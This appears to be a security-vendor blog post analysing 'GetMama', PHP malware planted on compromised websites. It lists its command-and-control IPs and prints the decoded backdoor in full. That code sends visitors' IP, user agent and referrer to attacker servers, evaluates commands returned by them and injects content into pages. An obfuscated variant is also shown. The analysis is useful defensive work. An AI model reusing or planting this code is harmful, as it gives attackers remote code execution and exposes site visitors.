GetMama – Conditional malware affecting thousands of sites

We have been tracking an interesting malware that is affecting thousands of compromised sites. We call it GetMama!!

Why conditional? Because instead of just displaying the malicious code to all the visitors of the web site, it connects back to its command and control server to find out what to do. It also sends back to the attackers the IP address, user agent and referrer of the person visiting the compromised site, so the command and control can determine if it should display the malicious content or not.

It also only displays the malicious content once a day per IP address and only to Windows users.

Why GetMama? Well, that’s how the malware authors called their own function (see sample in the bottom of the post).

COMMAND AND CONTROL (C2) SERVERS

Those are the command and control IP addresses. I recommend checking for traffic to these IP addresses and blocking them if possible:

78.46.173.14
176.9.218.191
91.228.154.254
77.81.241.253
184.82.117.110
46.4.202.93
46.249.58.135
176.9.241.150
46.37.169.56
46.30.41.99
94.242.255.35
178.162.129.223
78.47.184.33
31.184.234.96

For every request to the compromised sites, there will also be a random call to one of those. The called URL would look something like http://31.184.234.96/jedi.php?version=0991&mother=

MALICIOUS CODE

This is final decoded malware that gets executed on the compromised sites. For every request, it connects back to the attackers to determine what to do. The action could be to inject malware in the site, run a command in the server (it also acts as a backdoor) or to do nothing.

if (!function_exists("GetMama")){  

    function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}

    return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = 
gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} 

    function GetMama(){$mother = "compromisedsite.com";return $mother;}

    ob_start("opanki");

    function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}

   $url_0 = "http://" . $pa;
   $url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
   $try = true;

   if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($ch, CURLOPT_TIMEOUT, 3);
       $ult = trim(curl_exec($ch));
       $try = false;} 

    if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}

    if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
         $out .= "Host: $pa\r\n";
         $out .= "Connection: Close\r\n\r\n";
         fwrite($fp, $out);
         $ret = "";
         while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}}  

    if (strpos($ult,"eval") !== false)
    {
        $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
    }
    if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}
    else {return false;}}

    $father2[] = "78.46.173.14";
    $father2[] = "176.9.218.191";
    $father2[] = "91.228.154.254";
    $father2[] = "77.81.241.253";
    $father2[] = "184.82.117.110";
    $father2[] = "46.4.202.93";
    $father2[] = "46.249.58.135";
    $father2[] = "176.9.241.150";
    $father2[] = "46.37.169.56";
    $father2[] = "46.30.41.99";
    $father2[] = "94.242.255.35";
    $father2[] = "178.162.129.223";
    $father2[] = "78.47.184.33";
    $father2[] = "31.184.234.96";
    shuffle($father2);
    foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}

HEAVILY ENCODED

Note that the malware will not look like that (all pretty) on the compromised site. It can be encoded like this:

$VDNjO60q6FJNnaRjb6MS3d5d= array(’7920′,’7937′,’7916′,’7927′);$eVlnlmOOZXsWOJTjjxwj=
array(’3733′,’3748′,’3735′,’3731′,’3750′,’3735′,’3729′,’3736′,’3751′,’3744′,’3733′,
’3750′,’3739′,’3745′,’3744′);$albi35lY8fkUqy5DcKtZ2gECZNLn=
array(’5781′,’5780′,’5798′,’5784′,’5737′,’5735′,’5778′,’5783′,’5784′,’5782′,’5794′,
’5783′,’5784′);$aeMTktRM9OsQRAd5bpDQ7Bmj0ASq2z=”ZXZhbChiYXNlNjRfZGVjb2Rl…JYY683″);
$X7ry2SBupAHs89a1Fj06AYlUg2RO3VPSS6hKOI548Dm =
$V6uPJ50EnFVWUclEHg5TEJpQvcBf6g9XduCNpthDY2qI(‘$wnY8xO4XDfHK8pp1a4KS1RtGqo’,
$VyUF5BmxNFlWXVT3P.’(‘.$adCH8mcHCS3Fj8Bq8otsR6Hae.’($wnY8xO4XDfHK8pp1a4KS1RtGqo));’);
$X7ry2SBupAHs89a1Fj06AYlUg2RO3VPSS6hKOI548Dm($aeMTktRM9OsQRAd5bpDQ7Bmj0ASq2z);}

As you can see, its not using any of the normal “eval ( base64_decode” calls that webmasters are used to looking for. This malware has also evolved and it can be hidden in different ways.

We will post more details as we learn more about it.

Note that if your site is compromised, our free sitecheck scanner may miss this type of malware (because of the conditional way it works). If you think you are compromised, only our internal scans can find/clean it up.

Read more: GetMama – Conditional malware affecting thousands of sites